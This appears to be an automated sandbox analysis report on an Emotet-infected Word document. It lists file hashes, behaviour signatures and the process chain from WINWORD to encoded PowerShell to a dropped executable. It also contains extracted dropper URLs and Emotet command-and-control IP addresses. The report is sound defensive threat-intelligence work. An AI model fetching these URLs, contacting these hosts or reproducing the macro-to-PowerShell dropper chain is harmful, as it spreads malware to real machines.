Analysis

  • max time kernel
    23s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 06:35

General

  • Target

    445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae.doc

  • Size

    173KB

  • MD5

    f6f6b714cf2713a49b7733f3cd402957

  • SHA1

    78d1960925c523c20ab4d38b98593a5d9663aa2e

  • SHA256

    445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae

  • SHA512

    e7612c80911ae4b59cea5095834acd3758642bdd17216d02d49f8589e7f1888922c1e22980409d7bf23984e5fdc78995ada3fe9e2e4f73375193a03a7972d90d

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    exe.dropper  http://whateverest.ch/meditationes/4Pdv9304pyj8191258/
    exe.dropper  http://signworld.nl/website-ivo-2019/nRxK/
    exe.dropper  http://grieta.net/cgi-bin/rzXeV/
    exe.dropper  http://itcnt.com.np/wp-admin/AXc/
    exe.dropper  http://intere.com.br/erros/trdodu31307815/

Extracted

  • Family
    emotet
  • C2
    177.37.81.212:443
    74.207.230.187:8080
    190.164.75.175:80
    87.252.100.28:80
    105.209.239.55:80
    163.172.107.70:8080
    37.208.106.146:8080
    24.157.25.203:80
    212.112.113.235:80
    140.207.113.106:443
    75.139.38.211:80
    192.210.217.94:8080
    46.49.124.53:80
    75.127.14.170:8080
    87.106.231.60:8080
    139.59.12.63:8080
    181.167.35.84:80
    201.214.108.231:80
    74.208.173.91:8080
    189.146.1.78:443
  • rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 1 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\445eac6a0537d629f9fb1564dfedbe24fcd73cd97034d53ef2257ddfc9a2a0ae.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:112
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e 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
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    PID:1844
  • C:\Users\Admin\721.exe
    C:\Users\Admin\721.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    PID:1784
    • C:\Windows\SysWOW64\wiashext\Wpc.exe
      "C:\Windows\SysWOW64\wiashext\Wpc.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1576

Downloads

  • memory/112-2-0x0000000008A40000-0x0000000008A44000-memory.dmp

    Filesize

    16KB

  • memory/112-4-0x00000000070D0000-0x00000000072D0000-memory.dmp

    Filesize

    2.0MB

  • memory/112-5-0x000000000AED0000-0x000000000AED4000-memory.dmp

    Filesize

    16KB

  • memory/112-6-0x000000000BF50000-0x000000000BF54000-memory.dmp

    Filesize

    16KB

  • memory/112-9-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

  • memory/1784-12-0x00000000003B0000-0x00000000003BC000-memory.dmp

    Filesize

    48KB